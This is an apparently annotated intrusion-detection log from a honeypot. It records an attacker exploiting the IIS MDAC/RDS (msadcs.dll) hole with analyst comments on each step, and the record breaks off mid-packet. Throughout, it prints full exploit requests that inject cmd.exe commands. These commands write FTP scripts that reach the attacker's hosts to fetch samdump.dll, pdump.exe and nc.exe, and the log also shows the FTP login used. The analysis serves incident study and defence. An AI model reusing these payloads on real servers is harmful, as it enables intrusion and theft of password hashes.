Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.u.t. .n.e.w...p.a.s.s. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:22.322873 213.116.251.162:1801 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11260 IpLen:20 DgmLen:747 DF
***AP*** Seq: 0x967B00EF Ack: 0x2CB6EBC6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 553..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 344..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i.v.e.r
.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b
.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t
.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!-
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to start scripted FTP session with new script file
!@# Uses -n switch to suppress auto-login
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:29.400851 213.116.251.162:1803 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11271 IpLen:20 DgmLen:771 DF
***AP*** Seq: 0x9697470F Ack: 0x2CB7076E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 577..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 368..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.2. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t."
.).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D
.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p
.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;..
.--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.041264 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44720 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x361B134A Ack: 0x2CB70BAB Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.048140 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49527 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB70BAB Ack: 0x361B1380 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.101821 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44722 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x361B1380 Ack: 0x2CB70BB9 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.107508 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49783 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB70BB9 Ack: 0x361B13A4 Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP fails again due to login problems
!@# When nothing shows up on the FTP server the, intruer will know something is wrong
[**] FTP control channel [**]
02/04-05:34:30.163799 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44723 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x361B13A4 Ack: 0x2CB70BCA Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.169909 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:50039 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB70BCA Ack: 0x361B13BA Win: 0x21C8 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.216281 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44724 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x361B13BA Ack: 0x2CB70BD0 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to open an FTP connection to his own machine.
!@# This would prove that the machine CAN make FTP connections
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:47.612437 213.116.251.162:1808 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11326 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x96E03E47 Ack: 0x2CB74E64 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .2.1.3...1.1.6...2.5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:48.747703 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11332 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x96E52E89 Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Interesting FTP Banner
[**] FTP control channel [**]
02/04-05:34:49.294990 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11333 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x96E52EBB Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to start a new FTP script for his/her own FTP server, overwriting file 'ftpcom'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:30.010659 213.116.251.162:1812 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11353 IpLen:20 DgmLen:775 DF
***AP*** Seq: 0x9868B053 Ack: 0x2CB8DE58 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 581..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 372..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .o.p.e.n. .2.1.3...1.1.6...2.5.1...1.6.2. .>. .f.t.p.c.o
.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Adds username to FTP script, overwriting previous line.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:37.316228 213.116.251.162:1814 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11365 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x988652BC Ack: 0x2CB8FAFA Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:44.409331 213.116.251.162:1816 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11376 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x98A2F1C0 Ack: 0x2CB916AC Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# This script is designed to grab the toolkit
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:53.648139 213.116.251.162:1821 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11431 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x98C4BF01 Ack: 0x2CB93580 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:01.033430 213.116.251.162:1825 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11482 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x98E8BAF1 Ack: 0x2CB95788 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:08.382549 213.116.251.162:1827 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11493 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x99063709 Ack: 0x2CB9743F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:15.487857 213.116.251.162:1829 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11504 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x9922916D Ack: 0x2CB9900F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC exploit to start FTP client with 'ftpcom' script
!@# Since the open command was overwritten, the script does nothing
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:22.618538 213.116.251.162:1832 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11523 IpLen:20 DgmLen:733 DF
***AP*** Seq: 0x993FB647 Ack: 0x2CB9ABFD Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 539..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 330..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute, the MDAC exploit is used to send the an open command (to his own machine)
!@# This will not work though because cmd.exe does not know this is for the ftp session.
!@# The intruder likely got suspicious after no connections were made to his machine after the better part of a minute
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:27.521384 213.116.251.162:1840 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11568 IpLen:20 DgmLen:780 DF
***AP*** Seq: 0x9A3C2272 Ack: 0x2CBAA953 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 549..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 340..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.2...1.3.9...1.
2...2.6.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.
e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.
\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...
m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to start yet another FTP script called sassfile
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:29.736949 213.116.251.162:1842 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11579 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9A465B87 Ack: 0x2CBAB248 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:31.855334 213.116.251.162:1844 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11590 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9A4FFAF9 Ack: 0x2CBABA9D Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of this file is to try to download the toolkit again
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:33.939196 213.116.251.162:1846 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11602 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9A591BD3 Ack: 0x2CBAC284 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:36.006964 213.116.251.162:1848 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11613 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9A62897E Ack: 0x2CBACAC5 Win: 0x2238 TcpLen: 20
